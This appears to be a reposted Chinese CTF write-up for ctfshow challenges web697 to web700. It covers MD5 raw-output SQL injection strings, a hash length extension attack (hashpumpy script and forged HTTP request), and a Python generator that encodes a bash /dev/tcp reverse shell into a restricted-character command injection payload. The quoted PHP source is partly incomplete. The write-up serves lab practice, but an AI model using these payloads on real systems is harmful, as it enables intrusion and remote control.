ctfshow 大赛原题 web697--web700

news2024/11/22 18:40:35

web697

先扫一下,其实也可以不用扫
因为什么也扫不出来
在这里插入图片描述

这里看到有一个参数
在这里插入图片描述
在这里插入图片描述
尝试一下数组
在这里插入图片描述
随便输了,出了验证回显抓个包看
在这里插入图片描述
在这里插入图片描述

ffifdyop
e58
4611686052576742364

这三个md5加密可以自带引号

SELECT master FROM secret WHERE password = binary ' ,¹b¬Y[–K-#Kp'

在这里插入图片描述
在这里插入图片描述

web698

hash长度攻击

以为是注入但是admin之后给的提示是hash
在这里插入图片描述

cookie中有个值为0,此时如果我们改成1会怎么样呢
在这里插入图片描述

@error_reporting(0);

$flag = "flag{xxxxxxxxxxxxxxxxxxxxxxxxxxxx}";
$secret_key = "xxxxxxxxxxxxxxxx"; // the key is safe! no one can know except me

$username = $_POST["username"];
$password = $_POST["password"];
header("hash_key:" . $hash_key);

if (!empty($_COOKIE["getflag"])) {
    if (urldecode($username) === "D0g3" && urldecode($password) != "D0g3") {
        if ($COOKIE["getflag"] === md5($secret_key . urldecode($username . $password))) {
            echo "Great! You're in!\n";
            die ("<!-- The flag is ". $flag . "-->");
        }
        else {
            die ("Go out! Hacker!");
        }
    }
    else {
        die ("LEAVE! You're not one of us!");
    }
}

setcookie("sample-hash", 




, time() + (60 * 60 * 24 * 7));

if (empty($_COOKIE["source"])) {
    setcookie("source", 0, time() + (60 * 60 * 24 * 7));
}
else {
    echo "<source_code>";
    }
}

得到secretkey然后就可以为所欲为了,但是这个怎么得到呢
从sample-hash里面爆破出来诶那怎么获得呢,这里由于ctfshow的源码问题,我们的
hash_key=d5e1090511b80a55f206f1b0c03c8b5a; 就是
也就是说md5(secretkeyadminadmin)得到的值

 import hashpumpy

# def hashpump(hexdigest, original_data, data_to_add, key_length)
aaa = hashpumpy.hashpump("d5e1090511b80a55f206f1b0c03c8b5a","D0g3","bao",14)

print(aaa)

脚本和工具都可以打通,但是这个包我一直下载不了
我就在kali下载的工具打的,怎么下载就不说了,网上是有教程的

在这里插入图片描述
最后的包

POST /index.php HTTP/1.1
Host: 35a5d8b0-2503-4449-b7bc-6a86be132b0a.challenge.ctf.show
Cookie: hash_key=d5e1090511b80a55f206f1b0c03c8b5a; source=1;getflag=b3e208bbd53844729543fbbcd34e254c
Content-Length: 182
Cache-Control: max-age=0
Sec-Ch-Ua: "Not/A)Brand";v="8", "Chromium";v="126", "Google Chrome";v="126"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://35a5d8b0-2503-4449-b7bc-6a86be132b0a.challenge.ctf.show
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://35a5d8b0-2503-4449-b7bc-6a86be132b0a.challenge.ctf.show/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Priority: u=0, i
Connection: close

username=D0g3&password=D0g3%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%90%00%00%00%00%00%00%00bao&submit=submit

在这里插入图片描述
但是为什么是14呢上面的长度明明是16哇

Input Data to Add:这个是可以随便填的(添加的内容)
Input Signature:填原始的md5
Input Key Length: 不知道
predicted sig:转化出来的md5

文章非常好的文章

web699

<?php
highlight_file(__FILE__);
if(isset($_POST["cmd"]))
{
    $test = $_POST['cmd'];
    $white_list = str_split('${#}\\(<)\'0'); 
    $char_list = str_split($test);
    foreach($char_list as $c){
        if(!in_array($c,$white_list)){    相当于正则,只能用上面的符号构造命令
                die("Cyzcc"); 
            }
        }
    exec($test);
}
?>

在这里插入图片描述
在这里插入图片描述
这里的思路是进制表示命令那么使用特性构造出数字之后再打
介于是位运算我也不太熟那么本地一下?
欧克经过本地尝试决定还是记笔记吧有点难以理解

import requests
# 八进制
n = dict()
n[0] = '${#}'
n[1] = '${##}'
n[2] = '$((${##}<<${##}))'
n[3] = '$(($((${##}<<${##}))#${##}${##}))'
n[4] = '$((${##}<<$((${##}<<${##}))))'
n[5] = '$(($((${##}<<${##}))#${##}${#}${##}))'
n[6] = '$(($((${##}<<${##}))#${##}${##}${#}))'
n[7] = '$(($((${##}<<${##}))#${##}${##}${##}))'

f = ''

def str_to_oct(cmd):                                #命令转换成八进制字符串
    s = ""
    for t in cmd:
        o = ('%s' % (oct(ord(t))))[2:]
        s+='\\'+o   
    return s

def build(cmd):                                     #八进制字符串转换成字符
    payload = "$0<<<$0\<\<\<\$\\\'"                 #${!#}与$0等效
    s = str_to_oct(cmd).split('\\')
    for _ in s[1:]:
        payload+="\\\\"
        for i in _:
            payload+=n[int(i)]
    return payload+'\\\''

print(build('bash -i >& /dev/tcp/IP/port 0>&1'))
$0<<<$0\<\<\<\$\    
$0<<<$0        是-bash
\<\<\<     这个是<<<

在这里插入图片描述

web700

[安洵杯 2019]cssgame
csrf 没打通,不懂为啥

哎,这些题一个题就够我喝一壶了,有些麻烦

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1970433.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

文件包含漏洞汇总

文章目录 原理文件包含函数伪协议函数本地包含file协议filter协议input协议data协议 远程文件包含条件http协议 日志文件绕过概念日志路径复现 文件包含之条件竞争概念靶场介绍复现 文件下载文件下载常见的目录系统目录linuxwindows 程序配置文件apachenginxredis 目录遍历与目…

【STL专题】深入探索vector:动态数组的魔力【入门指南】

欢迎来到 CILMY23 的博客 &#x1f3c6;本篇主题为&#xff1a;深入探索vector&#xff1a;动态数组的魔力&#xff0c;入门指南 &#x1f3c6;个人主页&#xff1a;CILMY23-CSDN博客 &#x1f3c6;系列专栏&#xff1a;Python | C | C语言 | 数据结构与算法 | 贪心算法 | L…

结构体指针数组函数综合应用改写选票系统

第一次写百行的代码 有点吃不消 感受到程序员的不容易 其中遇到了很多问题 希望分享给大家 下面是是完整的且完善的代码 #include<stdio.h> #include<string.h> #include <stdlib.h> //定义结构体 struct XuanMin {char name[32];int tickets; }; //指针函…

1-4章节复习总结

1-4章节总结 章节重点回顾-第一章-中央处理单元练习题 章节重点回顾-第一章-进制章节重点回顾-第一章-校验码奇偶校验码CRC循环冗余校验码海明码练习题 多草节重点回顾-第一草-计算机体系结构分类章节重点回顾-第一章-计算机指令练习题 章节重点回顾-第一章-指令流水线练习题 章…

​​​​​Tomcat部署及优化

&#x1f49d;&#x1f49d;&#x1f49d;欢迎来到我的博客&#xff0c;很高兴能够在这里和您见面&#xff01;希望您在这里可以感受到一份轻松愉快的氛围&#xff0c;不仅可以获得有趣的内容和知识&#xff0c;也可以畅所欲言、分享您的想法和见解。 推荐:Linux运维老纪的首页…

洞见新能源汽车产业更智能的未来

新能源汽车行业进入智能化时代&#xff0c;除了备受关注的无人驾驶领域&#xff0c;新能源汽车在智能化的进程逐渐加快。智能化已成为中国汽车品牌的竞争力。 作为专业提供算网的服务商之一&#xff0c;VERYCLOUD睿鸿股份跟随新能源汽车行业快速变化&#xff0c;受邀前往CIAS 2…

天环公益首次推出原创开发进度网站,配备后台管理系统

天环公益组织近期创新性地发布了一个专用于监控与展示项目开发进程的官方网站&#xff0c;该网站特色在于其自研的后台管理系统。 对于有兴趣深入了解或参与管理的用户&#xff0c;可直接访问后台页面&#xff0c;入口为&#xff1a;admin.php。 值得注意的是&#xff0c;当前…

教育教学质量评测系统开发之软件技术分析

开发教学质量评测系统它不仅能够有效提升教育管理的科学性与透明度&#xff0c;还能精准反映教学过程中的问题与亮点&#xff0c;为教育决策提供坚实的数据支持。通过该系统&#xff0c;学校能够全面、客观地收集学生、教师及家长的反馈意见&#xff0c;促进教学相长&#xff0…

java各种锁有什么区别

Java 虚拟机&#xff08;JVM&#xff09;中有几种不同类型的锁&#xff0c;每种锁都有其特定的用途和性能特点。下面我将为你介绍几种常见的锁&#xff1a; 1.独占锁&#xff08;也称为悲观锁&#xff09;&#xff1a; 1.synchronized&#xff1a;这是 Java 提供的一种内置的独…

【数据结构】——栈和队列的实现(赋源码)

在前面我们已经学过顺序表以及单链表、双向表链的实现都是一种线性表&#xff0c;这里可以我们介绍栈和队列——是具有特殊化的线性表 栈 栈的概念以及结构 栈&#xff1a;⼀种特殊的线性表&#xff0c;其只允许在固定的⼀端进⾏插入和删除元素操作。进⾏数据插⼊和删除操作的…

Docker镜像的手动制作commit

目录 一、docker镜像说明 1.1 Docker镜像中有没有内核 1.2 为什么没有内核 1.3 容器中的程序后台运行会导致此容器启动后立即退出 1.4 Docker镜像的生命周期 1.5 制作镜像方式 二、 将现有容器通过docker commit手动构建镜像 2.1 基于容器手动制作镜像步骤 2.2 实战案…

【卷积神经网络】池化层【计算和python代码】

文章目录 1、简介2、池化层计算3、Stride4、Padding5、多通道池化计算6、数学公式⭐7、PyTorch 池化 API 使用7.1、形状调整7.2、最大和平均池化7.3、调整stride步长7.4、padding填充7.5、多通道池化7.6、完整代码⭐ 8、小结 &#x1f343;作者介绍&#xff1a;双非本科大三网络…

[Docker][Docker NetWork][上]详细讲解

目录 1.为什么需要网络管理2.Docker 网络架构简介0.铺垫说明1.CNM2.Libnetwork3.驱动 3.常见网络类型1.bridge 网络2.host 网络3.container 网络4.none 网络5.overlay 网络 1.为什么需要网络管理 容器的网络默认与宿主机及其他容器都是相互隔离&#xff0c; 但同时也要考虑以下…

Node污染 (Node.js)

&#x1f3bc;个人主页&#xff1a;金灰 &#x1f60e;作者简介:一名简单的大一学生;易编橙终身成长社群的嘉宾.✨ 专注网络空间安全服务,期待与您的交流分享~ 感谢您的点赞、关注、评论、收藏、是对我最大的认可和支持&#xff01;❤️ &#x1f34a;易编橙终身成长社群&#…

C语言指针(Pointer)

指针与底层硬件联系紧密&#xff0c;使用指针可操作数据的地址&#xff0c;实现数据的间接访问 问题&#xff1a;这好好的一个变量&#xff0c;我定义完之后为啥不用它名字直接访问呢&#xff1f;我非要用间接访问&#xff0c;这不没事找事吗&#xff1f; 为什么需要指针? …

18.C语言函数相关练习题2

函数相关练习题2 1.不同班级的平均分2.二维数组和函数的概念3.外部变量和全局变量4.全局变量的例子5.输入10个数&#xff0c;找出最大数及最大数的下标 1.不同班级的平均分 #include <stdio.h>void inityarry(int arr[],int len){int i;for(i0;i<len;i){printf("…

【第八天】DNS及其查询过程

DNS及其查询过程 什么是DNS&#xff1f; 一般我们的主机&#xff0c;服务器都有一个ip地址&#xff0c;例如10.10.10.1。在计算机层面&#xff0c;如果我们要发送请求的话&#xff0c;首先就要知道我们的目标&#xff0c;也就是对方的ip地址。而IP地址很难记&#xff0c;比如…

初学者编程指南:方法与资源推荐

一、引言 编程已成为当代大学生的必备技能&#xff0c;但面对众多编程语言和学习资源&#xff0c;新生们常常感到迷茫。如何选择适合自己的编程语言&#xff1f;如何制定有效的学习计划&#xff1f;如何避免常见的学习陷阱&#xff1f;编程不仅是技术领域的一项基本技能&#…